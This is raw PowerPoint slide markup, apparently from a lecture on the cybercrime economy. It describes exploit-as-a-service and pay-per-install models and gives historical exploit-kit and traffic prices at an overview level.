            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="739750" y="855947"/>
          <a:ext cx="10515600" cy="6101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Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3251745" y="4966385"/>
            <a:ext cx="0" cy="145411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85766" y="6180655"/>
            <a:ext cx="0" cy="2398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10438616" y="6171647"/>
            <a:ext cx="0" cy="3315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3251745" y="6421980"/>
            <a:ext cx="8325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504609" y="6162431"/>
            <a:ext cx="0" cy="2864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4504609" y="6448927"/>
            <a:ext cx="7106809" cy="677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a:xfrm>
            <a:off x="11611418" y="2126665"/>
            <a:ext cx="0" cy="43900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flipH="1">
            <a:off x="9973735" y="2126665"/>
            <a:ext cx="163768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B3DBC1-5D68-4327-9F7E-9CC4669056DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4296714" y="6174230"/>
            <a:ext cx="0" cy="49253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FDAFA2-28DA-49EC-B885-3B2BE77B64AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505400" y="6668974"/>
            <a:ext cx="27913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DD76233-8748-48BA-A5C0-85B198F15820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1505400" y="4966385"/>
            <a:ext cx="0" cy="17085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4787FDB-0F75-4C11-ADD9-9A98A3C531E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3541057"/>
            <a:ext cx="0" cy="4927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3D054B5-2392-4175-9CD5-CDE7FF4C0A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3548530"/>
            <a:ext cx="5996989" cy="465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48BDDD5-F446-438D-9B52-AB2568ADA333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5621701" y="3595111"/>
            <a:ext cx="0" cy="4386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D0F61A8-1D5D-447A-BBA7-869295DDE43F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161466" y="3595110"/>
            <a:ext cx="0" cy="4386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D536A7E7-A6E2-4715-8939-342DAD5AB441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6556798" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle: Rounded Corners 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6739DC6-B36D-489A-BCFA-643DCAEE5EAB}"/>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3908339E-1583-46AF-A390-A94A28E28DB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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rPr>
                <a:t>Zero-day Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="55" name="Group 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5FD889-3346-4CD8-A038-C5C40C956210}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9550956" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Rectangle: Rounded Corners 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08CBF0C-03A9-4452-A839-415F0248E337}"/>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B269B01C-5C1F-4067-AA5F-8E88FF7F55BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Crimeware</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59" name="Straight Connector 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA76E5D-33F4-4A5A-B745-17A391F4D76D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="53" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481636" y="1068185"/>
            <a:ext cx="0" cy="22949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1" name="Straight Connector 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D31171E-46D8-4B36-8CDE-5EB642F4D13A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10503171" y="1068185"/>
            <a:ext cx="0" cy="22949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2" name="Straight Connector 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B801004-FC82-43D0-BBB2-B7EA49575171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8925329" y="1297681"/>
            <a:ext cx="0" cy="30463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3" name="Straight Connector 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94C6349-1204-483B-BE52-BD95F8D8707B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7481637" y="1297681"/>
            <a:ext cx="3021534" cy="10176"/>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69" name="Rectangle 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D6170F-46E2-4F33-B4E8-2772E243B7B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7702987" y="1413945"/>
            <a:ext cx="2444684" cy="1205728"/>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76" name="Group 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40894DD1-ECDF-483A-B62D-198E51C83BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3699587" y="1923564"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050411" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rectangle: Rounded Corners 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E119D37-D620-41AC-B0E7-EB5491840D73}"/>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53F0EF3E-E5D5-47A7-B8F0-4AAB69871267}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389102" y="1411965"/>
              <a:ext cx="1875636"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rPr>
                <a:t>Bulletproof Hosting</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89783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Decoupling and Specialization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4612650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the old days, compromise and monetization were coupled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Criminals would develop exploits, use them to launch attacks, and then use the hacked machines to make money</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Today, these facets of the criminal underground are decoupled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit developers sell exploits kits or packs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other actors leverage the kits to attack hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often via spam and/or compromised web servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compromised hosts are then sold on the black market</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit-as-a-service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pay-per-install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> model of malware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35127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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28"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9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33"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4" dur="5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65CDE2-194C-4A17-9E3C-017E8A897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3276" y="712268"/>
            <a:ext cx="10410524" cy="1193533"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit-as-a-Service and Pay-per-Install</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2AE495E-2AAF-4BC1-87A5-331009D82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943275" y="2050180"/>
            <a:ext cx="11026117" cy="4807819"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A miscreant can buy an exploit kit and deploy it themselves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A miscreant can rent access to an exploit server that hosts an exploit kit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit-as-a-service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Direct victims to the exploit kit using spam or phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A miscreant can supply a piece of malware, service takes care of distributing it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pay-per-install services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bundle a traffic acquisition mechanism and an exploit server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12881894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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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 Kits and Traffic-PPI Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4813714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MPack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dates back to 2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many others: Blackhole, Incognito, Eleonore, Phoenix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit kit pricing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buying a Phoenix license cost $400 in 2009, $2200 in 2012</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Renting a Blackhole server costs $50/hour or $500/month</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traffic-PPI pricing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SellMeYourTraffic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – between $0.80-$3.00 per thousand visits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Traffbiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – $1.60 per thousand visits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only 9-14% of visits will result in a successful infection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3527219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Traffic-PPI Example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626" y="2293497"/>
            <a:ext cx="11894086" cy="3177915"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arrow: Down 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{378D2255-6706-4E9A-84CF-35B7282BEDA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19800000">
            <a:off x="1593356" y="1626208"/>
            <a:ext cx="689907" cy="96367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304E613D-ABAE-4359-B320-FE575AE0F8F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1800000">
            <a:off x="10699313" y="1338507"/>
            <a:ext cx="577159" cy="971958"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">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2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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.375E-6 4.07407E-6 L 0.23464 -0.04051 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="11732" y="-2037"/>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2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.23464 -0.04051 L 0.41459 -0.03264 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="8997" y="394"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="18" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="19" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetID="37" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="3" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.41459 -0.03264 L 0.27123 0.30023 C 0.24167 0.375 0.19701 0.4162 0.15013 0.4162 C 0.09675 0.4162 0.05443 0.375 0.02474 0.30023 L -0.11783 -0.03264 " pathEditMode="relative" rAng="0" ptsTypes="AAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-26628" y="22431"/>
                                    </p:animMotion>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1.875E-6 -2.22222E-6 L -0.22721 0.04259 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-11367" y="2130"/>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2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.22721 0.04259 L -0.48841 0.21459 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-13060" y="8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5" grpId="0" animBg="1"/>
      <p:bldP spid="5" grpId="1" animBg="1"/>
      <p:bldP spid="5"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FB513-7518-4643-810F-66A6B9E86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448" y="0"/>
            <a:ext cx="9433103" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34D4187E-8DA4-46BE-8B0A-B21B9BC1728E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518699" y="683812"/>
            <a:ext cx="4643562" cy="2210463"/>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Rectangle 2">
